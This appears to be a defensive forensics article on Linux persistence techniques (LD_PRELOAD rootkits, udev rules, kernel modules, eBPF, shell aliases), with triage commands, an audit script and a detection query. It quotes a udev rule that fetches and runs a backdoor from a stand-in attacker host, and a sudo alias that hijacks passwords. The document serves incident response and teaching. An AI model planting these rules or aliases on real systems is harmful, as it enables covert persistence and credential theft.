Artifact Analysis: Advanced Linux Persistence & Rootkits

1. Userland Rootkits: The `LD_PRELOAD` Hijack

The most common technique for achieving stealth without requiring kernel-level access is User-Mode Hooking via dynamic linker hijacking.

In Linux, the environment variable LD_PRELOAD or the global configuration file /etc/ld.so.preload instructs the dynamic linker to load a specific shared object (.so library) before any other library, including the standard C library (libc).

The Attack Mechanism: An attacker drops a malicious shared library and registers it in /etc/ld.so.preload. This malicious library intercepts (hooks) standard system functions like readdir (used by ls) or fopen (used by cat). When a system administrator types ls, the attacker’s readdir function executes first. It calls the legitimate readdir, filters out the string containing the malware’s filename, and returns the scrubbed list to the administrator. The malware becomes entirely invisible to user-space tools.

DFIR Offline Triage: Assuming the forensic image is mounted at /mnt/analysis/:

# Check if the global preload file exists and contains entries
cat /mnt/analysis/etc/ld.so.preload

# Review environment variables for compromised service accounts
cat /mnt/analysis/proc/*/environ | tr '\0' '\n' | grep "LD_PRELOAD"

Red Flag: The /etc/ld.so.preload file is empty or non-existent on 99% of healthy Linux systems. Any entry within this file must be treated as a severe Indicator of Compromise (IOC).

2. Event-Triggered Persistence: Udev Rules

Udev is the device manager for the Linux kernel. It utilizes rules to dictate what actions the OS should take when hardware events occur (e.g., plugging in a USB drive, or initializing a network interface).

Threat actors abuse this mechanism to trigger payloads asynchronously, avoiding traditional boot-sequence analysis.

The Attack: The adversary creates a malicious rule inside /etc/udev/rules.d/ or /lib/udev/rules.d/.
The Payload: ACTION=="add", SUBSYSTEM=="net", RUN+="/usr/bin/wget http://attacker.com/backdoor.sh -O /tmp/x; sh /tmp/x"
Forensic Value: This rule ensures that whenever a network interface comes online, the backdoor is automatically downloaded and executed. Analysts must explicitly grep for the RUN+= directive within the udev directories.

3. Ring 0 Persistence: Kernel Modules & eBPF

When threat actors gain root access, they frequently attempt to load code directly into the kernel, achieving ultimate system dominance.

A. Loadable Kernel Modules (LKM)

Attackers compile a malicious .ko (Kernel Object) module and load it using insmod or modprobe. An LKM can manipulate core kernel structures (like the System Call Table) to hide processes from the kernel’s own task list, bypass iptables firewalls entirely, and grant hidden root shells.

Offline Hunting: To survive reboots, LKMs must be registered in the startup configuration. Analysts must audit:
- /mnt/analysis/etc/modules
- /mnt/analysis/etc/modules-load.d/
- /mnt/analysis/etc/modprobe.d/

B. The Modern Threat: eBPF Backdoors

Extended Berkeley Packet Filter (eBPF) allows safe execution of sandboxed programs within the kernel without loading an LKM. By 2025/2026, sophisticated malware families (like BPFDoor or Symbiote) have shifted to eBPF. Attackers use eBPF to filter network packets before they ever reach the firewall, creating invisible “magic packet” triggers that spawn root shells only when a specific, crafted packet hits the network interface.

4. Shell Hijacking (User-Level Backdoors)

Stealthy persistence does not always require root privileges. Attackers often establish backdoors within a specific user’s interactive environment.

By modifying shell initialization scripts (e.g., ~/.bashrc, ~/.bash_profile, ~/.zshrc), attackers can create malicious aliases or functions.

Example Attack: alias sudo='sudo /tmp/.hidden_stealer.sh'
The Result: The next time the compromised user attempts to run a privileged command, the attacker’s script intercepts the cleartext password before passing it to the legitimate sudo binary.

#!/bin/bash
TARGET_DIR="/mnt/analysis"

echo "[+] Auditing LD_PRELOAD..."
if [ -f "$TARGET_DIR/etc/ld.so.preload" ]; then
    echo "ALERT: ld.so.preload exists! Contents:"
    cat "$TARGET_DIR/etc/ld.so.preload"
fi

echo "[+] Auditing Udev Rules for execution directives..."
grep -r "RUN+=" $TARGET_DIR/etc/udev/rules.d/ $TARGET_DIR/lib/udev/rules.d/

echo "[+] Auditing LKM auto-load configurations..."
ls -la $TARGET_DIR/etc/modules-load.d/
cat $TARGET_DIR/etc/modules 2>/dev/null | grep -v "^#"

// Detects suspicious loading of Kernel Modules via insmod or modprobe
DeviceProcessEvents
| where FileName in~ ("insmod", "modprobe")
// Filter out standard OS module loading during boot sequence
| where ProcessCommandLine !contains "systemd"
// Highlight modules loaded from unusual directories (e.g., /tmp, /dev/shm)
| extend SuspiciousPath = iff(ProcessCommandLine matches regex @"(/tmp/|/dev/shm/|/var/tmp/)", 1, 0)
| project TimeGenerated, DeviceName, InitiatingProcessAccountName, FileName, ProcessCommandLine, SuspiciousPath
| sort by SuspiciousPath desc, TimeGenerated desc

References & Further Reading

MITRE ATT&CK: Hijack Execution Flow: LD_PRELOAD (T1574.006)
MITRE ATT&CK: Boot or Logon Autostart Execution: Kernel Modules (T1547.006)
SANS Institute: Linux Threat Hunting
Related Artifact: Linux Systemd Service Persistence
Related Artifact: Linux SSH Artifacts & Persistence
Live Hunting: Linux Process & Volatile Memory Analysis